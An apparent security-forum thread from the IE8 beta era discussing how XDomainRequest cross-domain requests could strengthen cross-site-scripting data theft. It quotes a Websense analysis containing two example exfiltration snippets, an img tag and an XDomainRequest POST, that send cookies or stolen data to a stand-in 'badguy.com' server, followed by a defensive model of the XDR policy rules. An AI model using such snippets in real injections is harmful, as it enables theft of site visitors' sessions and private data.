IE8 comes with a completely new dangerous attack vector!

Hi malware fighters,

Internet Explorer 8 comes with all kinds of new features
that make computer crime a lot easier.
According to security vendor Websense, the new Microsoft browser,
of which the first beta has been launched recently, supports cross-domain requests.
In this way attackers can more readily abuse certain vulnerabilities in websites…
As a rule cross-site-scripting leaks work through an img tag,
as this is one of the few features that are allowed to communicate out.
Through the new XDR object an attacker may inject script code
that communicates directly with the malicious server.

“Through this kind of direct communication it is expected
that injection payloads will get more complex and through various features.
Malicious frameworks can be built so the client can be in continuous
communication with the malicious server
to see what actions should be performed.
Stealing private data is only the beginning
of what these new technologies will accomplish,”
according to security researcher Joren McReynolds.

Websense makes it clear that the problem is not only in Internet Explorer 8,
because other browsers like Firefox will implement this also.
“The benefits of being able to directly communicate are so large
when product development and interactivity are concerned,
that other browsers will bring this feature in.
Security and functionality are not the best matched pair,
which leads to extrapolations without a clear solution in sight.”

Yes my malware fighters.
This here is a completely new feature: in JavaScript an XMLHttpRequest
could only be sent to the same domain (‘same origin policy’).
This new interface does not have that restriction.
So a completely new and dangerous attack vector has been created.

polonus

So a completely new and dangerous attack vector has been created,
Has it been exploited or is this just theory ???

Hi bob3160,

No, it has not been exploited yet, but it is not only theory; it goes further: it is likelihood 100% and applied security so far 0%: http://www.websense.com/securitylabs/blog/blog.php?BlogID=177
The only restrictions made with XDR are that protocols must match (so an http and https mismatch = verboten) and the XDomainRequestAllowed header must have a value of 1:
http://msdn2.microsoft.com/en-us/library/cc288108(VS.85).aspx
This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By the time IE 8 clears its beta hurdles there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

polonus

It doesn’t surprise me that they have found a vulnerability already, but thankfully for most people it has been found at the beta stage.

That is probably linked to the new webslices - where you get an RSS feed from part of another web page that can be viewed whilst surfing elsewhere. Haven’t tried that function yet.

Hi essexboy,

Webslices is another feature. The feature in question is anonymous third party XDomainRequests:

Cross-domain Request (XDR) - XDomainRequest, is the easiest way to make anonymous requests to third-party sites that support XDR and opt in to making their data available across domains. But the server that does so can be a malicious one.
Security Concerns

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<img src="http://badguy.com/steal.php?cookie=" + cookie />

The tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest();
xdr.open("POST", "http://www.badguy.com/");
xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these. Also consider this new attack vector aided by Flash?!?

Conclusion

The concept of direct, external communication via the XDR object in Microsoft Internet Explorer 8 is nothing new. Similar communication has been achieved through other means, such as img tags, script src includes, iframes, flash files, and so on. It is also important to note that IE8’s external communication policy is not extremely unique and actually resembles Flash’s; both retrieve policy information on the request host (XDomainRequestAllowed header and crossdomain.xml respectively). The benefit of direct communication is so large in terms of product development and interactivity that other browsers, such as Firefox, are also implementing cross-domain request capabilities into their product. Security is always at odds with functionality, leading to tradeoffs without a clear solution.

This XDR implementation has come into FF 3 also now. Let us see who will direct the security implications of this first?

polonus
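The XDR rules summarised in the two posts above (the page's scheme must match the target's, the target must answer with an XDomainRequestAllowed header of 1, and the request is anonymous), modelled as an added example. This is not code from the forum or from the Websense post; the host names and headers are constructed placeholders.

```javascript
// Added model of the IE8 beta XDomainRequest policy as described in the
// thread. It is an illustration, not browser code. Host names are constructed.

function parseOrigin(url) {
  const m = /^(https?):\/\/([^/:]+)(?::(\d+))?/i.exec(url);
  if (!m) throw new Error("unsupported URL: " + url);
  const scheme = m[1].toLowerCase();
  return { scheme, host: m[2].toLowerCase(), port: m[3] || (scheme === "https" ? "443" : "80") };
}

// Would the browser hand the third-party response to the calling page?
// `responseHeaders` is what the target server sent back.
function xdrPolicy(pageUrl, targetUrl, responseHeaders) {
  const page = parseOrigin(pageUrl);
  const target = parseOrigin(targetUrl);
  // Rule 1: protocols must match (an http page may not call an https target).
  if (page.scheme !== target.scheme) {
    return { allowed: false, reason: "scheme mismatch (http vs https)" };
  }
  // Rule 2: the target opts in with "XDomainRequestAllowed: 1".
  // Header names are case-insensitive; the value must be exactly "1".
  const optIn = Object.entries(responseHeaders)
    .find(([name]) => name.toLowerCase() === "xdomainrequestallowed");
  if (!optIn || optIn[1].trim() !== "1") {
    return { allowed: false, reason: "target did not opt in" };
  }
  return { allowed: true, reason: "anonymous cross-domain request permitted" };
}

// Rule 3: the request is anonymous. No Cookie header is ever attached, so the
// policy protects the *target* site's sessions. It cannot stop data that an
// XSS hole already exposes to injected script from being posted to a server the
// attacker controls, because that server simply sets the opt-in header itself.
// The fix therefore stays at the injection point (output encoding), not in XDR.
function buildXdrRequest(targetUrl, body) {
  const t = parseOrigin(targetUrl);
  return {
    method: "POST",
    host: t.host,
    port: t.port,
    headers: { "Content-Type": "text/plain" },
    credentials: "omit",
    body,
  };
}
```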

This XDR implementation has come into FF 3 also now.
If that's the case, then this subject should also include the fact that this vulnerability also comes with Firefox 3.

I don’t want to make websites anymore :frowning:

There are too many complicated site hacking thingamabobs